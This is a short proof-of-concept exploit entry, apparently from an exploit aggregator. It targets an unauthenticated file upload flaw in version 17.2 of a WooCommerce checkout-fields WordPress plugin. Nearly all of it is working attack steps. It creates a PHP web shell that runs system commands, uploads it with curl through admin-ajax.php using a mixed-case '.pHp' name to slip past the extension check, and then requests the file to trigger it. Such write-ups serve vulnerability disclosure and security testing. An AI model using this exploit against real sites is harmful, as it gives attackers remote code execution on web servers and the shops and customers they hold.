Share
## https://sploitus.com/exploit?id=WPEX-ID:4DC72CD2-81D7-4A66-86BD-C9CFAF690EED
1. Install and activate woocommerce (dependency, no setup required)
2. Install and active the vulnerable plugin (n-media-woocommerce-checkout-fields 17.2)
3. Prepare the payload:

echo '<?php passthru("id"); ?>' > /tmp/payload.php

4. Invoke the following curl command to upload the payload (notice the name parameter is set to ".pHp"):

curl -i 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=cfom_upload_file&name=payload.pHp' \
    -F 'file=@/tmp/payload.php'

5. Trigger the payload:

curl -i 'http://127.0.0.1:7777/wp-content/uploads/cfom_files/payload.php'